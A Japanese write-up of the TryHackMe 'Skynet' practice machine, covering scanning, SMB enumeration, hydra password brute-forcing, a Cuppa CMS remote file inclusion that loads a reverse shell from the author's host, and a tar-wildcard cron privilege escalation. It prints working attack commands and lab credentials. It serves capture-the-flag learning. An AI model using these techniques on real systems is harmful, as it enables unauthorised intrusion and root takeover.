はじめに
TryHackMe の Skynet という machine をやっていきます。
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
nmap
kali@kali:~$ nmap -sC -sV 10.10.130.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-05 22:58 EDT
Nmap scan report for 10.10.130.51
Host is up (0.26s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL TOP RESP-CODES UIDL AUTH-RESP-CODE PIPELINING CAPA
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE LITERAL+ ID ENABLE post-login IMAP4rev1 have more listed LOGIN-REFERRALS capabilities LOGINDISABLEDA0001 OK SASL-IR Pre-login
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2020-05-05T21:59:32-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-06T02:59:33
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.89 secondsgobuster
kali@kali:~$ gobuster dir -u http://10.10.130.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.130.51
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/05 23:15:58 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
[ERROR] 2020/05/05 23:23:01 [!] Get http://10.10.130.51/opiskelu: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/05 23:25:44 [!] Get http://10.10.130.51/5949: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/05 23:25:44 [!] Get http://10.10.130.51/_templates: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/server-status (Status: 403)
===============================================================
2020/05/05 23:40:54 Finished
===============================================================一部エラー出てますけどこんな感じでした。
/squirrelmail は以下のページにリダイレクトされます。
nmap script で smb を調べる
kali@kali:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.237.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 03:18 EDT
Nmap scan report for 10.10.237.52
Host is up (0.26s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.237.52\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.237.52\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.237.52\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.237.52\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 55.98 seconds
kali@kali:~$ nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.237.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 03:20 EDT
Nmap scan report for 10.10.237.52
Host is up (0.27s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.237.52\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.237.52\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.237.52\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.237.52\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 57.33 secondssmbmap
公式の writeup をみてみると smbmap というのを使ってた 内容的には nmap script と変わらなそう
kali@kali:~$ smbmap -H 10.10.237.52
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.237.52...
[+] IP: 10.10.237.52:445 Name: 10.10.237.52
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
.
dr--r--r-- 0 Wed Sep 18 00:41:20 2019 .
dr--r--r-- 0 Tue Sep 17 03:20:17 2019 ..
fr--r--r-- 163 Tue Sep 17 23:04:59 2019 attention.txt
dr--r--r-- 0 Wed Sep 18 00:42:16 2019 logs
dr--r--r-- 0 Wed Sep 18 00:40:06 2019 books
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))smbclient
anonymous でアクセスします。
kali@kali:~$ smbclient //10.10.237.52/anonymous
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 18 00:41:20 2019
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
books D 0 Wed Sep 18 00:40:06 2019
9204224 blocks of size 1024. 5373956 blocks available
smb: \> cat attention.txt
cat: command not found
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Wed Sep 18 00:41:20 2019
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5373956 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.4 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \logs\> exit2 つのファイルをゲットしました。
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dysoncyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminatorhydra で password を当てる
milesdyson のパスワードを log1.txt から探します。
kali@kali:~$ hydra -l milesdyson -P log1.txt 10.10.35.53 http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-06 04:37:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.35.53:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.35.53 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-06 04:38:05これを使って squirrelmail にログインします。
samba に再度アクセス
)s{A&2Z=F^n_E.B`を使って smb にアクセスします。
kali@kali:~$ smbclient //10.10.35.53/milesdyson --user=milesdyson
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5373796 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 05:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 05:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 05:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 05:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 05:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 05:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 05:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 05:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 05:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 05:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 05:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 05:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 05:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 05:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 05:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 05:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 05:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 05:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 05:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 05:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 05:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 05:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 05:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 05:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 05:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 05:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 05:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 05:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 05:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 05:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 05:01:29 2019
9204224 blocks of size 1024. 5373796 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\> exitimportant.txtという明らかに重要そうなやつをみてみます。
kali@kali:~$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife/45kra24zxs28v3yd にブラウザでアクセスしてみます。
再度 gobuster
kali@kali:~$ gobuster dir -u http://10.10.35.53/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.35.53/45kra24zxs28v3yd
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/06 05:09:45 Starting gobuster
===============================================================
/administrator (Status: 301)
[ERROR] 2020/05/06 05:18:39 [!] Get http://10.10.35.53/45kra24zxs28v3yd/sub-top: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/06 05:34:42 [!] Get http://10.10.35.53/45kra24zxs28v3yd/t1039: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/05/06 05:35:02 Finished
===============================================================
searchsploit
kali@kali:~$ searchsploit cuppa
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | exploits/php/webapps/25971.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:~$ searchsploit -p 25971
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
File Type: ASCII text, with very long lines, with CRLF line terminators
Copied EDB-ID #25971's path to the clipboard.この exploit を使用してみます。 https://www.exploit-db.com/exploits/25971
リバースシェルとる
以下の php ファイルを https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
例のごとく python -m SimpleHTTPServer でホスティングし、http://10.10.30.62/45kra24zxs28v3yd/administrator//alerts/alertConfigField.php?urlConfig=http://10.9.27.249:8000/exploit.phpにアクセスし、Remote File Inclusion で実行します。
待ち構えておくとリバースシェルの取得に成功します。
kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.9.27.249] from (UNKNOWN) [10.10.35.53] 59582
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
05:15:53 up 2:18, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skynet:/$privilege escalation
pspy64 でみてみると
www-data@skynet:/tmp$ wget http://10.9.27.249:8000/pspy64
--2020-05-06 05:31:37-- http://10.9.27.249:8000/pspy64
Connecting to 10.9.27.249:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'
pspy64 100%[===================>] 2.94M 711KB/s in 8.9s
2020-05-06 05:31:47 (340 KB/s) - 'pspy64' saved [3078592/3078592]
www-data@skynet:/tmp$ chmod +x pspy64
www-data@skynet:/tmp$ ./pspy64
2020/05/06 05:32:31 CMD: UID=0 PID=1043 | /usr/sbin/acpid
2020/05/06 05:32:31 CMD: UID=0 PID=1038 | /usr/sbin/atd -f
2020/05/06 05:32:31 CMD: UID=0 PID=1024 | /lib/systemd/systemd-logind
2020/05/06 05:32:31 CMD: UID=0 PID=1019 | /usr/sbin/cron -f
2020/05/06 05:32:31 CMD: UID=104 PID=1007 | /usr/sbin/rsyslogd -n
2020/05/06 05:32:31 CMD: UID=0 PID=10 |
2020/05/06 05:32:31 CMD: UID=0 PID=1 | /sbin/init
2020/05/06 05:33:01 CMD: UID=0 PID=3431 | /bin/bash /home/milesdyson/backups/backup.sh
2020/05/06 05:33:01 CMD: UID=0 PID=3430 | /bin/sh -c /home/milesdyson/backups/backup.sh
2020/05/06 05:33:01 CMD: UID=0 PID=3429 | /usr/sbin/CRON -f
2020/05/06 05:33:01 CMD: UID=0 PID=3432 | tar cf /home/milesdyson/backups/backup.tgz 45kra24zxs28v3yd admin ai config css image.png index.html js style.css/bin/sh -c /home/milesdyson/backups/backup.shが定期的に実行されてます。
www-data@skynet:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#crontab に書かれてますね 内容はこんな感じです。
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *ここで着目すべきは *(ワイルドカード) です
以下の記事で詳しく説明がなされています。
Exploiting wildcards on Linux
要約すると
–-checkpoint=1や –-checkpoint-action=exec=sh shell.sh などの名前のファイルを作成しておくと、特定のコマンドでのワイルドカードの使用時にオプションとして理解されてしまう
というものです。
これを利用して、shell.shを以下の内容で作成し、
chmod 777 /root–-checkpoint-action=exec=sh shell.shも作成します。
$ ls
45kra24zxs28v3yd
admin
ai
config
css
image.png
index.html
js
shell.sh
style.css
–checkpoint-action=exec=sh shell.shあとは cronjob が実行されるのを待っていると
$ ls -la /
total 96
drwxr-xr-x 23 root root 4096 Sep 18 2019 .
drwxr-xr-x 23 root root 4096 Sep 18 2019 ..
drwxr-xr-x 2 root root 4096 Sep 17 2019 bin
drwxr-xr-x 3 root root 4096 Sep 17 2019 boot
drwxr-xr-x 17 root root 3640 May 6 05:59 dev
drwxr-xr-x 102 root root 4096 Sep 20 2019 etc
drwxr-xr-x 3 root root 4096 Sep 17 2019 home
lrwxrwxrwx 1 root root 32 Sep 17 2019 initrd.img -> boot/initrd.img-4.8.0-58-generic
lrwxrwxrwx 1 root root 33 Sep 17 2019 initrd.img.old -> boot/initrd.img-4.4.0-161-generic
drwxr-xr-x 22 root root 4096 Sep 17 2019 lib
drwxr-xr-x 2 root root 4096 Sep 17 2019 lib64
drwx------ 2 root root 16384 Sep 17 2019 lost+found
drwxr-xr-x 3 root root 4096 Sep 17 2019 media
drwxr-xr-x 2 root root 4096 Feb 26 2019 mnt
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
dr-xr-xr-x 149 root root 0 May 6 05:59 proc
drwxrwxrwx 4 root root 4096 Sep 17 2019 root
drwxr-xr-x 26 root root 920 May 6 06:25 run
drwxr-xr-x 2 root root 12288 Sep 17 2019 sbin
drwxr-xr-x 2 root root 4096 Sep 17 2019 snap
drwxr-xr-x 3 root root 4096 Sep 17 2019 srv
dr-xr-xr-x 13 root root 0 May 6 06:25 sys
drwxrwxrwt 9 root root 4096 May 6 06:43 tmp
drwxr-xr-x 10 root root 4096 Sep 17 2019 usr
drwxr-xr-x 14 root root 4096 Sep 17 2019 var
lrwxrwxrwx 1 root root 29 Sep 17 2019 vmlinuz -> boot/vmlinuz-4.8.0-58-generic
lrwxrwxrwx 1 root root 30 Sep 17 2019 vmlinuz.old -> boot/vmlinuz-4.4.0-161-generic/root にアクセス可能になります。
終わりに
最後のワイルドカードの部分はわからなさすぎて writeup カンニングしちゃいました。。
